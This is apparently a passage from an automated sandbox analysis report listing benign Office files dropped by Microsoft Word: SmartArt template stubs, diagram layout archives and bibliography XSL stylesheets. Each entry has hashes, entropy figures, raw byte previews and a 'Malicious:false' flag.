    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):252
    Entropy (8bit):3.48087342759872
    Encrypted:false
    SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
    MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
    SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
    SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
    SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):4326
    Entropy (8bit):7.821066198539098
    Encrypted:false
    SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
    MD5:D32E93F7782B21785424AE2BEA62B387
    SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
    SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
    SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
    Malicious:false
    Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):302
    Entropy (8bit):3.537169234443227
    Encrypted:false
    SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
    MD5:9C00979164E78E3B890E56BE2DF00666
    SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
    SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
    SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):217137
    Entropy (8bit):5.068335381017074
    Encrypted:false
    SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
    MD5:3BF8591E1D808BCCAD8EE2B822CC156B
    SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
    SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
    SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):254
    Entropy (8bit):3.4721586910685547
    Encrypted:false
    SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
    MD5:4DD225E2A305B50AF39084CE568B8110
    SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
    SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
    SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):4243
    Entropy (8bit):7.824383764848892
    Encrypted:false
    SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
    MD5:7BC0A35807CD69C37A949BBD51880FF5
    SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
    SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
    SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
    Malicious:false
    Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):286
    Entropy (8bit):3.4670546921349774
    Encrypted:false
    SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
    MD5:3D52060B74D7D448DC733FFE5B92CB52
    SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
    SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
    SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):5630
    Entropy (8bit):7.87271654296772
    Encrypted:false
    SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
    MD5:2F8998AA9CF348F1D6DE16EAB2D92070
    SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
    SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
    SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
    Malicious:false
    Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):278
    Entropy (8bit):3.5280239200222887
    Encrypted:false
    SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
    MD5:877A8A960B2140E3A0A2752550959DB9
    SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
    SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
    SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):268317
    Entropy (8bit):5.05419861997223
    Encrypted:false
    SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
    MD5:51D32EE5BC7AB811041F799652D26E04
    SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
    SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
    SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):264
    Entropy (8bit):3.4866056878458096
    Encrypted:false
    SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
    MD5:6C489D45F3B56845E68BE07EA804C698
    SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
    SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
    SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):6448
    Entropy (8bit):7.897260397307811
    Encrypted:false
    SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
    MD5:42A840DC06727E42D42C352703EC72AA
    SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
    SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
    SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
    Malicious:false
    Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):242
    Entropy (8bit):3.4938093034530917
    Encrypted:false
    SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
    MD5:A6B2731ECC78E7CED9ED5408AB4F2931
    SHA1:BA15D036D522978409846EA682A1D7778381266F
    SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
    SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):4888
    Entropy (8bit):7.8636569313247335
    Encrypted:false
    SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
    MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
    SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
    SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
    SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
    Malicious:false
    Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):260
    Entropy (8bit):3.494357416502254
    Encrypted:false
    SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
    MD5:6F8FE7B05855C203F6DEC5C31885DD08
    SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
    SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
    SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):6193
    Entropy (8bit):7.855499268199703
    Encrypted:false
    SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
    MD5:031C246FFE0E2B623BBBD231E414E0D2
    SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
    SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
    SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
    Malicious:false
    Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):286
    Entropy (8bit):3.5502940710609354
    Encrypted:false
    SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
    MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
    SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
    SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
    SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):270198
    Entropy (8bit):5.073814698282113
    Encrypted:false
    SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
    MD5:FF0E07EFF1333CDF9FC2523D323DD654
    SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
    SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
    SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" 